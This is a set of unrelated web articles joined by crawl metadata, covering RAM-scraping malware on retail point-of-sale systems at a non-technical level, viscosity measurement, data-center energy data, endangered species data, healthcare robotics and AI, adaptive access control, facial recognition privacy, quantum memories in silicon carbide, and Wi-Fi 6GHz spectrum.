Learn more about the importance of designing to fail from Lucidchart. | <urn:uuid:3f20fbb2-2747-4407-9324-bb5416d2e6c7> | CC-MAIN-2022-40 | https://www.cio.com/article/189102/designing-to-fail-a-paradigm-shift-for-cios.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00587.warc.gz | en | 0.942221 | 1,203 | 2.546875 | 3 |
Do you own or operate a retail business? You aren’t alone. Statistics show that there are now over 1 million retail businesses operating in the United States. Assuming your retail business has a brick-and-mortar store, you may want to take precautions to protect it from random access memory (RAM)-scraping malware. Retail businesses are often targeted with RAM-scraping malware because they use point-of-sale (POS) systems.
What Is RAM-Scraping Malware?
Also known simply as memory-scraping malware, RAM-scraping malware is malicious software that scans and steals data from a device’s RAM. All computers have RAM. Computers use RAM to temporarily store data, primary data associated with open programs or processes. But RAM isn’t limited to computers. Other types of devices have RAM as well, including retail POS systems. Hackers will often use RAM-scraping malware to target retail POS systems.
Retail POS Systems and RAM-Scraping Malware
Retail POS systems are responsible for processing customers’ payments. In the past, they consisted of mechanically operated cash registers. Today, most retail POS systems are computer based. They may have a built-in cash register, but modern-day computer-based POS systems are able to scan credit cards so that customers aren’t forced to pay with cash.
If your retail business uses a computer-based POS system, it may become a target for RAM-scraping malware. When a customer scans his or her card, the information will be stored in the POS system’s RAM. RAM-scraping malware may be used to capture and steal this data
POS Malware vs RAM-Scraping Malware
The term “POS malware” is used to describe RAM-scraping malware that specifically targets the RAM of POS systems. It’s become more common in recent years. Hackers will deploy POS malware on retail businesses’ devices and IT infrastructures, which they’ll use to steal customers’ data.
The term “RAM-scraping” malware refers to all forms of malicious software that target the RAM of a device. It may target the RAM of a POS system, or it may target the RAM of a desktop computer or laptop. POS malware is simply a type of RAM-scraping malware.
Different forms of malware target different parts of a device. While most forms of malware target storage drives, RAM-scraping malware targets the RAM. It’s a concern for retail businesses because of its ability to capture and steal customers’ data. If your retail businesses use a POS system, you’ll need to secure it so that it’s not susceptible to RAM-scraping malware. | <urn:uuid:4217d9da-45d6-41ca-8fd1-47d6c27905d5> | CC-MAIN-2022-40 | https://logixconsulting.com/2022/06/15/how-ram-scraping-malware-targets-retail-pos-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00587.warc.gz | en | 0.907351 | 590 | 2.546875 | 3 |
Measurement and Interpretation of Viscosity for the Process Industries
Viscosity is an important quality of many consumer and industrial products. For example, customers judge many personal products, such as shower gel and shampoo, by their “feel” and assess the quality of foods, such as ketchup and mayonnaise, by their texture. Similarly, the performance of paints, in their end use, is determined by their viscosities since this affects how easy they are to apply and how they move after application. The likelihood of a paint dripping down a vertical wall will be determined by its viscosity.
A fluid is considered Newtonian if its viscosity is independent of the rate at which it is being sheared (e.g., mixed or pumped). Most viscous fluids are non-Newtonian, though. That means to some degree, their viscosity hinges on the rate at which they are being sheared. The majority of these are shear-thinning, meaning their viscosity decreases as the rate of mixing or pumping increases.
Viscosity can be measured by several devices, most commonly a Couette, cone-and-plate or capillary viscometer. Their basic operating principle is to measure the force required to move the fluid at a certain velocity. The force can be converted to the shear stress being exerted on the fluid, and the velocity can be related to the shear rate. The dynamic viscosity of the fluid is then the ratio of shear stress to shear rate.
The diamond symbols in Figure 1 measure the shear stress versus shear rate, known as a rheogram, for corn syrup measured using a Couette viscometer. The first thing to notice: the relationship between shear stress and shear rate is linear, which means this is a Newtonian fluid.
The circles are the plot of viscosity versus shear rate, and because this is a Newtonian fluid, it is constant. This Corn Syrup has a viscosity of 20.7 Pascal-seconds (Pa s) or 20700 centiPoise (cP). For comparison, water (another Newtonian fluid) has a viscosity of 1 cP.
Figure 2 shows a rheogram for mayonnaise. In this case, the shear stress data, the diamonds, curve downwards with increasing shear rate. This indicates the fluid is shear thinning. The viscosity, shown by the circles, decreases with increasing shear rate. At a shear rate of 1 reciprocal second (s-1), the viscosity is 120 Pa s, while at 10 s-1, it is 18 Pa s. So, the questions for engineers: what is the shear rate generated by my equipment, and what is the viscosity that should be used for design calculations?
Another potential property of viscous fluids is time dependency. This is demonstrated in Figure 3, which shows the rheogram for tomato ketchup. It is well known that ketchup will not flow out of its bottle until it has been shaken. This is because the fluid builds structure with time in the bottle, and this structure must be broken before it will flow. The shear stress plot shows two curves; the red diamonds show the Couette bob speed increasing, and the blue show when it is decreasing. As the bob accelerates, the structure that has built in the ketchup is broken so that, when it decelerates, the bob is moving in a simple shear-thinning fluid. In this case, engineers should consider whether their equipment will ever stop operating long enough for structure to build, which would require the equipment to restart in a more viscous fluid. If this is possible, how should the equipment be sized accordingly?
There is a more extreme form of non-Newtonian behavior exhibited by fluids with a yield stress. In these cases, the mixer or pump must generate a minimum force before the fluid will move. This is analogous to the yield stress in a solid material. If a steel bar is stretched or bent, it will return to its original position unless the shear stress exerted exceeds its yield stress. In that case, the bar will permanently deform.
Figure 4 shows the rheogram for a polymer solution. At shear rates below 1 s-1, the shear stress has constant value of ~300 Pa with changing shear and this is the fluid’s yield stress.
An agitator must generate a shear stress that exceeds the fluid yield stress or it will not move. In a stirred vessel this results in stagnation at the walls and fluid surface, which can lead to poor incorporation of materials added to the vessel, poor heat transfer from the vessel walls into the fluid and incomplete mixing of a batch.
One final point to note is that these measurements should be made over the range of shear rates that are expected in the equipment being designed. Typical shear rates in stirred tanks are lower than found in pipe flow, and these are lower than found in a paint spray nozzle. It is quite common for the relationship between shear stress and shear rate to change over a wide range of shear rates and it can be dangerous to extrapolate beyond the range over which the measurements were made. | <urn:uuid:5ad46539-5885-4df5-9770-9b1ec8ade0bc> | CC-MAIN-2022-40 | https://me-middle-east.cioreview.com/cxoinsight/measurement-and-interpretation-of-viscosity-for-the-process-industries-nid-34979-cid-276.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00587.warc.gz | en | 0.954979 | 1,086 | 3.859375 | 4 |
Renewable energy initiatives have been on the news agenda the last couple of weeks. According to Bloomberg, a large proportion of the Fortune 500 has set clean energy goals in response to the savings generated by renewable power. As companies amass huge amounts of data, a significant part of their strategy for reaching their ambitious goals will involve data centers, no matter if a business owns, builds or uses them in the Cloud.
Apple is leading the way in this area. The company recently released its Annual Environmental Responsibility Report which provides a detailed outline of the steps it is taking to ensure its data centers are environmentally friendly.
Of course, in order to assess progress and success these companies will also need to track and report against sustainability and energy efficiency metrics too.
Reliable data is critical
But metrics are only as good as the accuracy of the data feeding into them. If companies put sustainability at the core of their business strategies, the metrics they set will be heavily scrutinized.
So, what happens if raw data from data centers is not properly cleaned and validated, leading to weeks and even months of incorrect and misleading information?
The result will be an embarrassing anomaly in the resulting operational report and a lot of awkward explaining to managers, stakeholders and potentially customers and shareholders.
Accurate, reliable data is central to a serious sustainability initiative; collecting raw data and presenting it is simply not enough. After all, important decisions about a facility’s environmental profile are made on the basis of that data, so it needs to be spot-on.
The key to meeting environmental goals with confidence is to collect, clean, validate and then analyze the data relating to energy efficiency, carbon emissions and water consumption, in order for the business to have confidence in it. In this way, data center managers can quickly understand what areas need adjustments and remove the risk of making poorly informed decisions due to bad data when planning changes or improvements for each facility.
Another crucial point for organizations with clean energy objectives is in the planning of data centers. A report containing incorrect data could lead to a design that struggles to meet the business requirements, or to large budgets being spent without a verifiable return on investment . Analysis of available data can help to ascertain the most economic, sustainable and cost effective design options and locations before a spade even hits the ground.
It is reassuring to see so many renewable and environmentally-minded projects being initiated by world leading organizations. Let’s hope they pay as much attention to clean data as they do to clean energy.
Zahl Limbuwala is founder and executive director of Romonet, a company that develops software for data center lifecycle analytics | <urn:uuid:7b9a6a19-6a40-4c11-abb9-0116eacbb676> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/opinions/why-clean-data-is-as-important-as-clean-energy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00587.warc.gz | en | 0.950345 | 536 | 2.625 | 3 |
Endangered species data consists of information about the prevalence of animal and plant species in a region and focuses on the existential threats they face.
Information about the numbers and range of threatened and endangered species comes from scientific observation. The information is then verified officially by national or international bodies, such as the IUCN (International Union for the Conservation of Nature).
Not all scientific observation needs to come from scientists, anyone can take conservation courses to learn how to assess species’ vulnerability. See, for example, the IUCN Red List training courses.
This data can appear in interactive maps or in columns of information. However, standard data attributes, aside from species, include ecoregion, threats, and status. The IUCN Red List offers nine statuses: Extinct, Extinct in the Wild, Critically Endangered, Endangered, Vulnerable, Near Threatened, Least Concern, Data Deficient, and Not Evaluated.
Other organizations may have their own statuses list but the Red List is the largest and most used resource around the world.
Researchers use this data to study endangered animal and plant species as well as the environments they live in. Conservationists also use this data to work to enhance the biodiversity of a region or of the planet in general.
With less than 5% of known species on the planet measured for endangered status, one of the greatest challenges of this category is the lack of comprehensiveness. In addition, plants and wild animals don’t volunteer for study; researchers and conservationists must track them down to record their prevalence. In short, the recording of this data is one of the greatest challenges of this data category and the only solution is further study and observation.
Changing threats to habitats and species and changes in taxonomic classification are other challenges experienced.
Unfortunately, big data also risks harming endangered and vulnerable wildlife.
Cybersecurity news often focuses on how hackers access personal information, bank accounts, social media, and government data. But what if “cyberpoachers” started targeting information on the locations of endangered species through their animal tracking data?
AER – Earth provides research & studies on everything interconnected with our planet
Arabesque Portfolio Screening Tool provides screening services on licensing in order to gain insights and reports of an entities’ portfolio performance on S-ray scores. It features benchmark comparison, reporting every week, monthly, or quarterly, and automated portfolio updates.
Sustain Planet Earth Committed™ is based on the SDG of the United Nation for small and mid-enterprises. | <urn:uuid:dcbb8773-1038-45df-8d39-d336a729b5e9> | CC-MAIN-2022-40 | https://www.data-hunters.com/category/conservation-data/endangered-species-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00787.warc.gz | en | 0.900023 | 524 | 3.921875 | 4 |
Modern tech has revolutionized the healthcare industry. When patients can’t be treated at the hospital, new technologies enable patients to receive quality care from the comfort of their homes.
SwissCognitive Guest Blogger: Sam Bowman “The Future of Healthcare in the Home May Come With Robots”
But while the benefits of telehealth were once limited to virtual checkups and prescription deliveries, modern healthtech is advanced enough to completely replace several services offered by primary care providers, hospitals, and specialists.
Thanks to modern robotics — and the artificial intelligence that supports its functionality — care is more convenient, accurate, and affordable than ever. Let’s explore some of the new technology that brings doctors to patients’ homes, and how providers and patients alike can benefit from robots in the future of healthcare.
Boosting Access to Care With Healthtech
The need for increased healthcare accessibility is always a pressing need. Modern healthcare technology has already made it possible for patients to get access to care that’s not locally available, but with the rise of more robots and AI, remote medical support is more widely applicable than ever before.
For example, nursing robots can now perform advanced tasks like drawing blood with greater accuracy by using scans. In addition, there’s no need for rural patients to travel to specialists just for a brief checkup. Eventually, advancements in the precision of surgical robots may even allow emergency care to occur in the home with supervision.
Robotic exoskeletons are a particularly exciting development right now. When healthcare providers are far away, this technology — which supports mobility — allows patients to get around safely in their homes, whether they want to go to the restroom or exercise. This improves independence (and therefore, quality of life) for many long-term patients. For physical therapy patients, exoskeletons could provide continued treatment without regular visits, which can be demanding for those in rural areas.
Offering Mental Health Support Around the Clock
While the robots in healthcare largely support physical health, many innovators are developing new tools to support mental wellness, too. For example, PARO — a therapeutic robot that looks and sounds like a baby harp seal — can reduce patient stress and increase socialization. When implemented in home-based care or assisted living facilities, robots like PARO reduce the challenges and risks associated with real-life therapy animals, all while providing comfort to patients in times of need.
Robots and AI technologies can also detect physiological signs of mental health crises, like changes in heart rate for people who are about to have a panic attack or changes in tone of voice for people with worsening depression. While they won’t replace therapists any time soon, they can be key tools for healthcare practices and home-based nurses that can’t otherwise monitor patients 24/7.
Using Robots To Cut Costs and Boost Efficiency
Robots can be incredibly cost-effective for healthcare providers. When used for healthcare in the home, they eliminate the need for costly nursing labor in menial tasks (like cleaning medical supplies). Medical professionals can offer more attentive care or treat more patients in less time.
AI technology, whether integrated into a robot or on a computer, can also analyze large amounts of patient data faster than any human. This empowers both telehealth and home-based care providers to quickly provide medical answers — like skin care diagnoses and medical condition updates — as well as cost-effective treatment plans. As a result, medical practices may be able to reduce the burden of healthcare costs for patients. Treatment costs alone can decrease by 50% with the support of AI.
Digitization Comes With Risks — But They Can Be Mitigated
The implementation of robotics, AI, and other healthcare technologies isn’t without risk. Digital tools that are connected to the internet can be exposed to cybercrime. For example, while the movement to the cloud has increased transparency by making medical records more accessible, it also increases the risk of sensitive information being stolen. If home WiFi isn’t secure, it can also lead to in-home nursing robots being hacked and used in nefarious ways.
Providers can help patients decrease the risks of modern medical technologies — and artificial intelligence can fittingly be a tool to fight these risks. AI can automatically detect cyberattacks and contribute to faster responses to potential breaches.
Healthcare technologies, when implemented safely, can offer significantly more rewards than risks for home care providers and patients.
The Future of Healthcare Is Here
Healthcare technologies are more advanced than ever, and the rising introduction of robots in the medical field is something to celebrate. Robots and AI are making it possible for providers to offer accurate physical care — like symptom monitoring and blood draws — and supportive mental health care alike from afar. New solutions alleviate the costs and travel time needed for quality healthcare to occur for both patients and providers.
While digitized healthcare always comes with some risks — especially that of cybercrime — its benefits far outweigh the potential downsides, which can be mitigated with the right steps.
About the Author:
Sam Bowman is a published freelance writer from the West Coast who specializes in healthcare tech and artificial intelligence content. His experience in patient care directly translates into his work and his passion for industry technologies influences the content he creates. Sam has worked for years – directly in, and writing about – healthcare technology and the many benefits it offers to patients and doctors alike. He loves to watch as medical tech and business software grow and develop, ushering in a modern age of industry. | <urn:uuid:0cf54dfb-dbf2-417d-a47e-488001b8448c> | CC-MAIN-2022-40 | https://swisscognitive.ch/2022/09/15/the-future-of-healthcare-in-the-home-may-come-with-robots/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00787.warc.gz | en | 0.939204 | 1,126 | 2.953125 | 3 |
Adaptive access control is the process of using IT policies that allow administrators to control user access to applications, files, and network features based on multiple real-time factors. It is more flexible and secure than a legacy "moat" approach.
Explore additional adaptive access control topics:
Companies dealing with unprecedented IT expansion and evolution should ask themselves a few questions about their security and access control policies.
Are they using strategies that will truly protect against the types of threats they'll face today? Have they adequately prepared for the rise of remote work and bring your own (BYO) device policies? Will their chosen security approaches allow employees to work efficiently rather than interrupting workflows?
To answer "yes" to those questions, IT departments will have to go beyond legacy methods that were designed with in-office employees and corporate-owned hardware in mind. Those traditional security approaches were rigid and focused on binary options—some actions were allowed and others were blocked, with very little nuance. A better approach was needed.
Adaptive access control allows IT departments to set granular security policies that affect every application, API, software tool, and network resource their employees use. When implemented effectively, such an approach combines strong, flexible cybersecurity with a simple end user experience, keeping businesses safe and efficient as conditions change around them.
While technology evolution has never been static, the past few years have been especially eventful. Many companies that previously experimented with remote or hybrid workforce models suddenly found themselves using these strategies 100% of the time during COVID-19. Cloud service adoption rates spiked and BYOD technology became essential to continued operations.
As the pace of digital transformation accelerates, IT teams need to make sure these changes don't outpace their ability to keep networks and user accounts secure. Cybercriminals constantly look for vulnerabilities in corporate systems, and periods of rapid change are likely times for them to strike.
This is where concepts such as adaptive access control can truly prove their worth, providing organizations with flexible ways to protect systems. Traditional approaches to security—building proverbial moats around important network resources using firewalls and VPNs—simply doesn't work when employees are relying on personal devices and networks to access software remotely.
IT admins need access control policies that acknowledge the numerous ways users log in and use company resources. Adaptive access control technology uses modern analytics, machine learning, and automation to grant an appropriate level of access for each user session.
An adaptive access control policy should incorporate several modern security approaches, creating the ideal combination of user flexibility and wide-ranging security. A solution that is too rigid tends to fail on both counts, restricting users' actions while still failing to keep them safe from novel threat types such as zero-day attacks. Going beyond a limited security solution means embracing:
Adaptive access control can apply to a variety of applications today. Whether an organization hosts applications in its own datacenter or uses cloud apps with a SaaS model, IT departments can introduce this advanced and context-driven form of access control.
It's up to the IT department to decide what level of access is appropriate. When a user's risk score increases, potentially due to their location or the kind of device they're using, the features available to them may be affected. Rather than selecting whether a user has access to an app or not, the IT department can switch off capabilities such as the ability to take a screenshot or to use a device's USB drive. These precautions exist to prevent the potential loss of sensitive data while not interrupting the user experience. The result is higher productivity for legitimate users and defenses against hackers.
See how Citrix helps you go beyond SSO and multi-factor authentication (MFA) to build an adaptive access control strategy.
The problems with legacy access control methods come down to one central idea: they were designed for a version of IT that no longer exists at many organizations. Expanding beyond the perimeter of the traditional enterprise datacenter means widening a business's potential attack surface, and static access control policies are not flexible enough to make this transition.
For many years, the concept of corporate application security was relatively simple. Using these methods today may leave organizations vulnerable, limit their efficiency, or do both. These static access control policies are based on whitelisting. Certain URLs and user profiles receive access to a list of specific applications.
When users need remote access, they take advantage of solutions such as a virtual private network (VPN). This prevents them from employing their own BYOD devices and network connections, while also granting too much trust to users who have the right credentials.
Once an account or device has been whitelisted, the system may not detect malicious activity from that device. In an era of indirect attack types such as spear phishing, this represents a dangerous security loophole. Add this risk profile to the inconvenience of disallowing BYO devices, and it's clear that traditional security has become outdated.
The modern networking environments companies use today have evolved beyond the point where a perimeter-based approach featuring a static access control model can protect them. Not only do remote and hybrid workforces include employees working from a wide variety of devices from their own locations, but the applications they access have also become more complex as well.
IT departments today are tasked with protecting apps hosted in private clouds, public clouds, and on-premises datacenters. With an adaptive access control method employing ZTNA principles, it's possible to oversee all these systems from a single, cloud-based security suite.
The monitoring and access control technologies deployed across these sprawling networks allow IT departments to carefully guard against advanced threats without the painstaking process of setting up dozens of security tools. The managed security stack demands less manual input from IT professionals, while still delivering a level of protection that would be impossible with more rigid tools.
When selecting a security approach, the first consideration is keeping apps, users, and information safe from threats. That isn't the only factor IT departments should use to choose how they protect their technology, however. They should also consider the impact on the user experience.
Productivity depends on users being able to access all the digital tools and resources associated with their roles. Adaptive access control allows IT departments to set access profiles that will give employees these capabilities automatically, ensuring they don't have to keep interrupting workflows to verify their identities or log into extra applications. With access management and permissions handled automatically, these steps go into the background.
In cases where there is an elevated security risk level, or when an employee is trying to use a feature beyond their usual needs, the IT department can manually verify the user’s identity. At other times, the adaptive authentication and access control systems are unobtrusive and essentially invisible.
The other major benefit to user experience lies in the adaptive access control systems’ ability to enable employees to log in from a wide variety of locations and BYOD endpoints. While more restrictive static access control policies may have excluded such devices altogether, preventing remote employees from getting work done in their preferred ways, modern access control frees them up.
The ideal access control provider for a modern company will have a few specific features, setting itself apart from the generations of legacy technology that came before. This platform will be:
Businesses get such a system when they select Citrix Secure Private Access as their ZTNA security and access control solution. Having this technology in place is an essential step in expanding into a new era of remote work and cloud-enabled expansion. | <urn:uuid:2b8f39e2-ae8d-41bc-905f-e3d606618cf2> | CC-MAIN-2022-40 | https://www.citrix.com/en-my/solutions/secure-access/what-is-adaptive-access-control.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00787.warc.gz | en | 0.951842 | 1,531 | 2.53125 | 3 |
Thursday, September 29, 2022
Published 2 Years Ago on Monday, Jun 15 2020 By Mounir Jamil
As the current pandemic continues to spread, we notice that digital health technologies are on the rise. With that in mind, we’ve taken the liberty of curating the top 5 influential digital health technologies being utilized right now, all over the world.
1: 3D Printing
Healthcare institutions are facing a shortage of medical equipment, with the lack of personal protective equipment (PPE) and even failing respirators, these factors are putting medical personnel and patients at a great risk. To meet the new shift in demand, digital health technologies such as 3D printing are being used. People are 3D-printing all types of equipment from face shields all the way to swabs and even ventilator parts.
Telemedicine is also one of the digital health technologies being used in the fight against COVID-19. Albeit telemedicine is an already established field, it has seen a massive boom in usage during the pandemic. Companies like Amwell’s telemedicine app have reported usage skyrocketing up by a significant 158% in the U.S. since January. Appointments through PlushCare have also increased by 70%. In comparison to before the pandemic, only 1 in 10 US patients reported using telemedicine services. The pandemic has given digital health technologies like telemedicine a much-needed boost. It is very probable we will see an increase in adoption and development as we move forward.
3: Smartphone Tracking
Governments around the world have resorted to digital health technologies that track smartphone users, identify their location and alert those that might be in close proximity to someone with is infected with the virus. At least 10 countries are employing such surveillance methods. Singapore’s app uses Bluetooth and wireless signals for tracing a user’s proximity, while Moscow launched a QR-based system to track the virus.
4: Artificial Intelligence (AI)
With the current pandemic, the importance of AI in digital health technologies has been made more prominent. The Zhongnan Hospital in China is utilizing an AI-based system for CT lung screening to help doctors prioritize potential COVID-19 cases for further testing. In addition, Barabasi Lab is merging machine learning with network science in the hope of finding potential drug candidates against the virus.
5: Virtual Reality (VR)
Virtual Reality holds promising uses in the fight against COVID-19. A study conducted by Harvard Business Review revealed that surgeons that were trained with VR showed a 230% improvement in their overall surgical performance. VR can also be used to develop empathy amongst medical students by placing them in different simulations that help understand patient’s needs.
Even during its current winter state, the crypto world is still alive. New buyers are still coming in, maybe not as before, but still, some are committed to buying the dip. The Crypto wallet conversation is one to be had when venturing into the crypto world. Between the crypto physical wallet and its virtual counterpart […]
Stay tuned with our weekly newsletter on all telecom and tech related news.
© Copyright 2022, All Rights Reserved | <urn:uuid:bdb87670-0066-48fc-a855-185509566e49> | CC-MAIN-2022-40 | https://insidetelecom.com/digital-health-technologies-against-covid-19/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00187.warc.gz | en | 0.945046 | 689 | 2.765625 | 3 |
AI is leveraged in many industries, and healthcare is prime amongst them. The article examines the perceptions and viewpoints Ghanaian healthcare workers have about AI health applications
SwissCognitive Guest Blogger: Randy Adjepong, AI Engineer, Editor
Artificial Intelligence is great, it’s fashionable, more importantly, it scales! The knowledge of its full potential hasn’t been understood yet, but we can see the great innovations through voice recognition, facial recognition, and image classification.
Artificial intelligence, a construct that dominates the fourth industrial revolution is evading most people. It either is too abstract and complex to understand, or coupled with Hollywood’s bombast, a manufactured fear for it.
In rural Africa, I believe Artificial Intelligence, at this stage no means an elixir, can still pose a great solution to big problems we face, especially in the healthcare field.
In the quest to find out the perception and attitudes healthcare professionals had about Artificial Intelligence, I disseminated a survey through a medical practitioner friends network to ascertain their honest opinions and feelings about the use of AI.
My survey, using a social research approach made use of a mixed methods survey combining a questionnaire and interviews to further appreciate the information in the (subjects) own words. Statistical tests were employed to derive meaningful insights from the data using R.
Out of a possible sample size of 250, a pool of 77 participants fully completed the questionnaire and 10 agreed to a follow up interview.
The GAAIS questionnaire as designed by Schepman and Rodway contained items which examines the subjects’ general attitudes toward artificial intelligence. As a standardised scale the score could suggest whether a participant expressed a more positive attitude or a negative attitude.
What really is AI?
Overall, 80% of participants expressed a positive attitude towards AI which showed that healthcare professionals in Ghana should be in favour of using big data in electronic health records, deploying image classification in medical diagnosis, and using robots for laparoscopic surgery.
Regardless of their positive outlook on AI, a further interview showed they had little knowledge on application in the healthcare field. As though I was not surprised by this, the sheer knowledge they showed about other applications such as voice recognition with SIRI, haptic feedback in goal line technology were still impressive.
What this suggests is that the general acceptance and appreciation of Artificial intelligence was prevalent amongst healthcare professionals and the knowledge of specific healthcare application was virtually non-existent.
Artificial Intelligence is the machines’ ability to mimic human intelligence thereby making work much easier for humans. Humans are always in search for the most productive and efficient way to complete tasks, and AI provides an elixir to all such processes.
Where we are in the AI journey?
If amid all these technological innovations, Ghana as a whole fails to catch up with it as their Europe or American counterparts, we face a challenge of leveraging these technologies.
Quite recently, start-up companies like zipline through drone activities have assisted in transporting medical equipment to the rural parts of Ghana. An intervention which will have costed the government much money and time wastage in the past.
Consequently, there has been a upspring of virtual health clinics as well which are promising patients a much-renewed sense of healthcare service and allowing for healthcare givers to administrate a personalised service delivery.
As though virtual healthcare clinics powered using big data and machine learning may not solve the average Ghanaians healthcare pleas, there exist other alternative and solutions which could be used in averting deficit in the doctor to patient ratio.
The complexities involved
But assimilating new technologies in any new culture or organisation is not a walk in the park. People are not usually readily accepting of change and a careful assessment of my survey shows the reservations some medical professionals may have about using AI in their line of work.
A junior physician said that “in using AI through virtual healthcare clinics it disrupts provider-patient relationship which is of prime importance in medical care. A patient usually may not know what exactly the problem may be but through body language and speech it could assist me in arriving at diagnosis”
Another junior physician lamented:
“We don’t have the necessary foundation to deal with the large amount of data we produce here in our healthcare facilities. I think it is much better to focus on other aspects of the healthcare system than deploying technologies which will eventually render some people jobless”
What I find interesting about the notion of allocating resources to more important facets of the healthcare system at the expense of AI is that, AI as a technology is built for a society like ours, the notion that AI is a fancy technology only adaptable by much advanced and wealthy countries is far from the truth.
Ratio of doctors to 100,000 population in selected low and middle-income African and high income countries (1995–1999). (Source: Liese et al 2003.)
Remote patient monitoring an intervention that is made possible through the combination of Artificial intelligence and Internet of things is something that effectively assist the deficit in provider patient ratios, maternal mortality rates will be effectively reduced, and communicating information will be much effective.
I can only deduce that strong opinions of fear and hostility towards AI is widespread across continents, and the need to educate people further on its use cases and domain-specific applications will be important.
Like any new technology Africa has its own problems of which AI can solve optimally, it’s not meant only for the fancy FinTech industry but in healthcare, mining and oil and gas industries.
If you are interested in reviewing the data collected for the short survey, it is available upon request here
About the Author:
Randy Adjepong is an AI researcher/entrepreneur. He enjoys debunking myths about AI in the most deprived parts of the World. | <urn:uuid:a7610fb8-5aab-4228-8cd2-ae406c6a6fa6> | CC-MAIN-2022-40 | https://swisscognitive.ch/2022/03/29/perceptions-ghanaian-healthcare-workers-have-about-ai/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00187.warc.gz | en | 0.947138 | 1,197 | 2.640625 | 3 |
It’s called This is how we lost control of our faces in the February 5, 2021 edition of MIT Technology Review, written by Karen Hao.
The article outlines a study recently published by Deborah Raji and Genevieve Fried titled About Face: A Survey of Facial Recognition Evaluation, which includes a survey of over 100 face datasets compiled “between 1976 to 2019 of 145 million images of over 17 million subjects….” It reportedly is the largest study of facial recognition technology ever conducted.
Hao posits that the study “shows just how much this enterprise has eroded our privacy. It hasn’t just fueled an increasingly powerful tool of surveillance. The latest generation of deep-learning-based facial recognition has completely disrupted our norms of consent.”
There are way too many fascinating things about Hao’s synopsis of the study and the study itself to summarize in a blog post. Both are worth reading and contemplating in determining facial recognition technology’s impact on our own privacy, as well as how we want different facets of society to respect our privacy if using facial recognition technology. The study analyzes the development and use of facial recognition technology over the past 30 years. It is relevant and insightful into how we can shape parameters around the use of facial recognition over the next 30 years and beyond.
As Raji and Fried say, “Facial recognition technologies pose complex ethical and technical challenges. Neglecting to unpack this complexity-to measure it, analyze it and then articulate it to others-is a disservice to those, including ourselves, who are most impacted by its careless deployment.” | <urn:uuid:cca0f0b8-1823-4cdb-bb4c-3f2877cdf379> | CC-MAIN-2022-40 | https://www.dataprivacyandsecurityinsider.com/2021/02/privacy-tip-272-to-get-up-to-speed-on-facial-recognition-technology-read-this/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00187.warc.gz | en | 0.938279 | 335 | 2.59375 | 3 |
UofChicago Team Demonstrates Atomic Quantum Memories in Silicon Carbide & Created Entangled State
(UChicago) Scientists at the University of Chicago demonstrated control of atomic quantum memories in silicon carbide, a common material found in electric cars and LED light bulbs. Then, they used this control to create an “entangled state,” representing a connection between the quantum memories and electrons trapped in the semiconductor material.
The study effectively shows how one could encode and write quantum information onto the core of a single atom, unlocking the potential for building qubits that can remain operational—or “coherent”—for extremely long times. The study results hold major implications for quantum computing, according to the authors.
“Just like a desktop computer has different types of memory for various purposes, we envision quantum technologies will have similar needs,” said co-first author Alexandre Bourassa, a graduate student at the Pritzker School of Molecular Engineering at the University of Chicago. “Our trapped electron is like a CPU, where different nuclear spins can effectively be used as a quantum RAM and hard-drive to provide both medium- and long-term storage of quantum information.” | <urn:uuid:69587f85-e993-4839-bb25-d23c38ee5616> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/uofchicago-team-demonstrates-atomic-quantum-memories-in-silicon-carbide-created-entangled-state/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00187.warc.gz | en | 0.880064 | 246 | 3.328125 | 3 |
Since the introduction of wireless to networking, the WLAN has been limited by one major factor: the radio spectrum. When Wi-Fi was first introduced, the spectrum was limited to less than 100Mhz in the 2.4GHz range. Throughout the various evolutions of wireless networking, two of the main goals have been to more efficiently use spectrum, and to add spectrum to overcome overlap and throughput constrictions. The new 1200MHz of spectrum provided by the 6GHz channels allows us to rethink how we design channel plans, plus leveraging larger channel widths – previously considered bad practice – allows us to overcome previous constraints.
The Overlap Problem
Wireless networks operate by using a spread spectrum concept; this means the energy from the transmission spans across a portion of the spectrum, in our case, either 22MHz or 20MHz wide. This is how we come up with the three non-overlapping channels in the 2.4GHz band. With 5GHz support in 802.11a/ac/ax, our usable spectrum increases 5x to 500 MHz, allowing for 25 non-overlapping 20MHz channels. Wi-Fi 6 introduces another frequency range for our use: 6GHz with up to 1200MHz of new spectrum (this varies by geography). If your region supports all 1200MHz of the new spectrum, 59 additional channels are available to client devices! As client devices that are capable of supporting this new spectrum come to market, at a minimum it is important to think about how our wireless designs will change in key high-density areas.
Capacity and Throughput
In 2021, the number of mobile devices almost reached 15 billion and is expected to soon reach 16 billion according to Statista research. With the increase in the number of devices needing to be connected, the amount of data we use during each session has exponentially grown. For example, using TikTok (a popular video sharing platform) for 5 minutes creates almost 100MB of data. Instagram, another popular video and photo-sharing platform, uses nearly 40MB of data in the same timeframe. On the extreme end, watching a 4K ultra high-definition video stream uses close to 6GB of data per hour, while browsing the web uses approximately 15MB per hour, according to our tests. We need to walk the fine line of capacity and throughput to provide the bandwidth for these data-hungry services.
